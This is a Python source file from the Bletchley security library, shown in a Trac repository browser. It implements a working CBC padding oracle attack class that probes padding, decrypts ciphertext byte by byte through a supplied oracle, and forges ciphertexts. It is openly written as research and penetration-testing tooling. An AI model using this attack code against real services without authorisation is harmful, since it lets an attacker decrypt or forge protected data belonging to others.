source: lib/bletchley/CBC/__init__.py @ 18

Last change on this file since 18 was 18, checked in by tmorgan, 12 years ago

documentation, bugfixes

File size: 11.1 KB
Line 
'''
Created on Jul 4, 2010

Copyright (C) 2010 ELOI SANFÈLIX
Copyright (C) 2012 Timothy D. Morgan
@author: Eloi Sanfelix < eloi AT limited-entropy.com >
@author: Timothy D. Morgan < tmorgan {a} vsecurity . com >

 This program is free software: you can redistribute it and/or modify
 it under the terms of the GNU Lesser General Public License, version 3,
 as published by the Free Software Foundation.

 This program is distributed in the hope that it will be useful,
 but WITHOUT ANY WARRANTY; without even the implied warranty of
 MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
 GNU General Public License for more details.

 You should have received a copy of the GNU General Public License
 along with this program.  If not, see <http://www.gnu.org/licenses/>.
'''
21
22import random
23import struct
24import threading
25from .. import buffertools
26from .Exceptions import *
27
class POA:
    """This class implements padding oracle attacks given a ciphertext and
    function that acts as a padding oracle.

    The padding scheme is assumed to be PKCS#5/#7, also defined in RFC2040.
    This attack was first described in:
     "Security Flaws Induced by CBC Padding. Applications to SSL, IPSEC,
      WTLS" by Serge Vaudenay (2002)

    All buffers (ciphertext, IV, plaintext) are byte strings: `str` on
    Python 2, `bytes` on Python 3.

    POA objects are not thread-safe.  If multiple threads need to work
    simultaneously on the same ciphertext and oracle, create a
    separate instance.

    """

    ## private
    _thread_result = None   # byte value accepted by the oracle, shared by worker threads
    _oracle = None
    _ciphertext = None
    _iv = None

    ## protected (reading ok, changing not ok)
    block_size = None

    ## public (r/w ok)
    decrypted = None        # tail of the plaintext recovered so far
    threads = None
    log_fh = None

    def __init__(self, oracle, block_size, ciphertext, iv=None,
                 threads=1, decrypted=b'', log_file=None):
        """Creates a new padding oracle attack (POA) object.

        Arguments:
        oracle -- A function which returns True if the given ciphertext
         results in a correct padding upon decryption and False
         otherwise.  It is always called with exactly one argument:
           def myOracle(ciphertext)
         The argument is the original ciphertext with two further blocks
         appended: a (modified) prior block followed by the block
         currently under attack.

        block_size -- The block size of the ciphertext being attacked.
         Is almost always 8 or 16.

        ciphertext -- The ciphertext to be decrypted.  Its length must be
         a non-zero multiple of block_size.

        iv -- The initialization vector associated with the ciphertext;
         must be exactly one block long.  If none provided, it is
         assumed to be a block of 0's

        threads -- The maximum number of parallel threads to use during
         decryption.  If more than one thread is used, then the oracle
         function will be called in parallel.  It should implement any
         internal locking necessary to prevent race conditions where
         applicable.

        decrypted -- If a portion of the plaintext is already known (due
         to a prior, partially successful decryption attempt), then this
         may be used to restart the decryption process where it was
         previously left off.  This argument is assumed to contain the
         final N bytes (for an N-byte argument) of the plaintext; that
         is, the tail of the plaintext.

        log_file -- A Python file object where log messages will be
         written.

        Raises InvalidBlockError if the ciphertext or IV length does not
        fit the block size.

        """

        if len(ciphertext) % block_size != 0 or len(ciphertext) < block_size:
            raise InvalidBlockError(block_size, len(ciphertext))
        # The IV stands in for the block preceding the first ciphertext
        # block, so it has to be exactly one block long.
        if iv is not None and len(iv) != block_size:
            raise InvalidBlockError(block_size, len(iv))

        self._oracle = oracle
        self._ciphertext = ciphertext
        self._iv = iv
        self.block_size = block_size
        self.decrypted = decrypted
        self.threads = threads
        self.log_fh = log_file


    def log_message(self, s):
        """Writes s plus a newline to the log file, if one was supplied."""
        if self.log_fh is not None:
            self.log_fh.write(s + '\n')


    def _ask_oracle(self, data):
        """Submits data to the oracle as an immutable byte string.

        bytes() is str() on Python 2, so this matches the historical
        str(...) coercion there while also being correct on Python 3.
        """
        return self._oracle(bytes(data))


    def probe_padding(self, prior, final):
        """Attempts to verify that a CBC padding oracle exists and then determines the
        pad value.

        Arguments:
        prior -- Ciphertext block (or IV) preceding the final block
        final -- Final ciphertext block, whose plaintext carries the pad

        Returns the pad string, or None on failure.  On success the pad
        string is also stored in self.decrypted.
        XXX: Currently only works for PKCS 5/7.
        """

        prior_vals = bytearray(prior)   # integer view, same on Python 2 and 3
        ret_val = None
        # First probe for beginning of pad: corrupt one plaintext byte at
        # a time, front to back.  The first corruption the oracle rejects
        # marks the first pad byte.
        for i in range(0 - self.block_size, 0):
            if i == -1:
                # The last byte is always part of the pad; nothing to test
                break
            tweaked = struct.pack("B", prior_vals[i] ^ 0xFF)
            if not self._ask_oracle(self._ciphertext + prior[:i] + tweaked
                                    + prior[i+1:] + final):
                break

        pad_length = 0 - i
        self.log_message("Testing suspected pad length: %d" % pad_length)
        if pad_length > 1:
            # Verify suspected pad length by changing last pad byte to 1
            # and making sure the padding succeeds
            tweaked = struct.pack("B", prior_vals[-1] ^ (pad_length ^ 1))
            if self._ask_oracle(self._ciphertext + prior[:-1] + tweaked + final):
                ret_val = buffertools.pkcs7Pad(pad_length)

        else:
            # Verify by changing pad byte to 2 and brute-force changing
            # second-to-last byte to 2 as well.  j == 0 must be tried too:
            # it is the right guess when that plaintext byte already is 2.
            tweaked = struct.pack("B", prior_vals[-1] ^ (2 ^ 1))
            for j in range(256):
                guess = struct.pack("B", prior_vals[-2] ^ j)
                if self._ask_oracle(self._ciphertext + prior[:-2] + guess
                                    + tweaked + final):
                    # XXX: Save the decrypted byte for later
                    ret_val = buffertools.pkcs7Pad(pad_length)
                    # Only one guess can yield a valid 2-byte pad
                    break

        if ret_val:
            self.decrypted = ret_val

        return ret_val


    # XXX: This could be generalized as a byte probe utility for a variety of attacks
    def _test_value_set(self, prefix, suffix, value_set):
        """Thread worker: tries each byte value in value_set between
        prefix and suffix, recording the first one the oracle accepts in
        self._thread_result.
        """
        for b in value_set:
            if self._thread_result is not None:
                # Stop if another thread found the result
                break
            if self._ask_oracle(prefix + struct.pack("B", b) + suffix):
                self._thread_result = b
                break


    def decrypt_next_byte(self, prior, block, known_bytes):
        """Decrypts one byte of ciphertext by modifying the prior
        ciphertext block at the same relative offset.

        Arguments:
        prior -- Ciphertext block appearing prior to the current target
        block -- Currently targeted ciphertext block
        known_bytes -- Bytes in this block already decrypted

        Returns the newly decrypted byte followed by known_bytes (or
        known_bytes unchanged if the block is already complete).  The new
        byte is also prepended to self.decrypted.

        Raises InvalidBlockError if block is not one block long, and
        Exception if the oracle accepts none of the 256 candidates.

        """

        if len(block) != self.block_size:
            raise InvalidBlockError(self.block_size, len(block))
        num_known = len(known_bytes)

        if num_known >= self.block_size:
            return known_bytes

        prior_vals = bytearray(prior)
        known_vals = bytearray(known_bytes)
        pad_value = num_known + 1                   # pad byte we try to forge
        target = self.block_size - num_known - 1    # offset of the byte under attack

        prior_prefix = prior[0:target]
        base = prior_vals[target]
        # Adjust known bytes to appear as a PKCS 7 pad
        suffix = [prior_vals[i - num_known] ^ known_vals[i] ^ pad_value
                  for i in range(num_known)]
        suffix = struct.pack("B" * len(suffix), *suffix) + block

        # Each thread spawned searches a subset of the next byte's
        # 256 possible values
        self._thread_result = None
        workers = []
        for i in range(0, self.threads):
            t = threading.Thread(target=self._test_value_set,
                                 args=(self._ciphertext + prior_prefix, suffix,
                                       range(i, 256, self.threads)))
            t.start()
            workers.append(t)

        for t in workers:
            t.join()

        if self._thread_result is None:
            raise Exception("Padding oracle rejected all 256 candidate values "
                            "for block offset %d" % target)

        decrypted = struct.pack("B", self._thread_result ^ base ^ pad_value)
        self.decrypted = decrypted + self.decrypted
        #  Return previous bytes together with current byte
        return decrypted + known_bytes


    def decrypt_block(self, prior, block, last_bytes=b''):
        """Decrypts the block of ciphertext provided as a parameter.

        Arguments:
        prior -- Ciphertext block (or IV) preceding block
        block -- Ciphertext block to decrypt
        last_bytes -- Already known trailing plaintext bytes of this block

        Returns the block's plaintext.
        """

        # '<' rather than '!=' so an over-long last_bytes cannot spin forever
        while len(last_bytes) < self.block_size:
            last_bytes = self.decrypt_next_byte(prior, block, last_bytes)
        return last_bytes


    # XXX: Add logic to begin where decryption previously left off
    def decrypt(self):
        """Decrypts a message using CBC mode. If the IV is not provided,
        it assumes a null IV.

        Returns the plaintext with its PKCS 7 pad stripped.  Raises
        Exception if the padding probe fails or the oracle rejects every
        candidate for some byte.

        """

        blocks = buffertools.splitBuffer(self._ciphertext, self.block_size)

        final = blocks[-1]
        iv = self._iv
        if iv is None:
            iv = b'\x00' * self.block_size
        if len(blocks) == 1:
            # If only one block present, then try to use IV as prior
            prior = iv
        else:
            prior = blocks[-2]

        # Decrypt last block, starting with padding (quicker to decrypt)
        pad_bytes = self.probe_padding(prior, final)
        if pad_bytes is None:
            self.log_message("Padding probe failed; oracle does not behave "
                             "like a PKCS 7 padding oracle")
            raise Exception("Unable to verify padding oracle or determine "
                            "pad length")
        decrypted = self.decrypt_block(prior, final, pad_bytes)

        # Now decrypt all other blocks except first block
        for i in range(len(blocks) - 2, 0, -1):
            decrypted = self.decrypt_block(blocks[i-1], blocks[i]) + decrypted

        # Finally decrypt first block, unless it was the only block and
        # has therefore already been handled above
        if len(blocks) > 1:
            decrypted = self.decrypt_block(iv, blocks[0]) + decrypted

        return buffertools.stripPKCS7Pad(decrypted)


    def encrypt_block(self, plaintext, ciphertext):
        """Computes the prior block that makes ciphertext decrypt to
        plaintext.

        Arguments:
        plaintext -- Desired plaintext, exactly one block long
        ciphertext -- Ciphertext block to build upon, one block long

        Returns the tuple (prior, ciphertext).  Raises InvalidBlockError
        if either argument is not exactly one block long.
        """
        if len(plaintext) != self.block_size or len(plaintext) != len(ciphertext):
            raise InvalidBlockError(self.block_size, len(plaintext))

        # decrypt_block() records what it recovers in self.decrypted, but
        # with a null prior block that is intermediate cipher state, not
        # plaintext of the original message -- so put the old value back.
        saved = self.decrypted
        try:
            ptext = self.decrypt_block(b'\x00' * self.block_size, ciphertext)
        finally:
            self.decrypted = saved
        prior = buffertools.xorBuffers(ptext, plaintext)
        return prior, ciphertext


    # XXX: Add option to encrypt only the last N blocks.  Supplying a shorter
    #      plaintext and subsequent concatenation can easily achieve this as well...
    def encrypt(self, plaintext):
        """Encrypts plaintext (after PKCS 7 padding) using only the
        padding oracle.

        Returns the tuple (iv, ciphertext) as byte strings.
        """
        blocks = buffertools.splitBuffer(
            buffertools.pkcs7PadBuffer(plaintext, self.block_size),
            self.block_size)

        if (len(self.decrypted) >= self.block_size
            and len(self._ciphertext) >= 2 * self.block_size):
            # If possible, reuse work from prior decryption efforts on original
            # message for last block
            old_prior = self._ciphertext[0 - self.block_size*2:0 - self.block_size]
            final_plaintext = self.decrypted[0 - self.block_size:]
            prior = buffertools.xorBuffers(
                old_prior,
                buffertools.xorBuffers(final_plaintext, blocks[-1]))
            ciphertext = self._ciphertext[0 - self.block_size:]
        else:
            # Otherwise, select a random last block and generate the prior block
            ciphertext = struct.pack("B" * self.block_size,
                                     *[random.getrandbits(8)
                                       for i in range(self.block_size)])
            prior, ciphertext = self.encrypt_block(blocks[-1], ciphertext)

        # Continue generating all prior blocks
        for i in range(len(blocks) - 2, -1, -1):
            prior, cblock = self.encrypt_block(blocks[i], prior)
            ciphertext = cblock + ciphertext

        # prior as IV
        return bytes(prior), bytes(ciphertext)
Note: See TracBrowser for help on using the repository browser.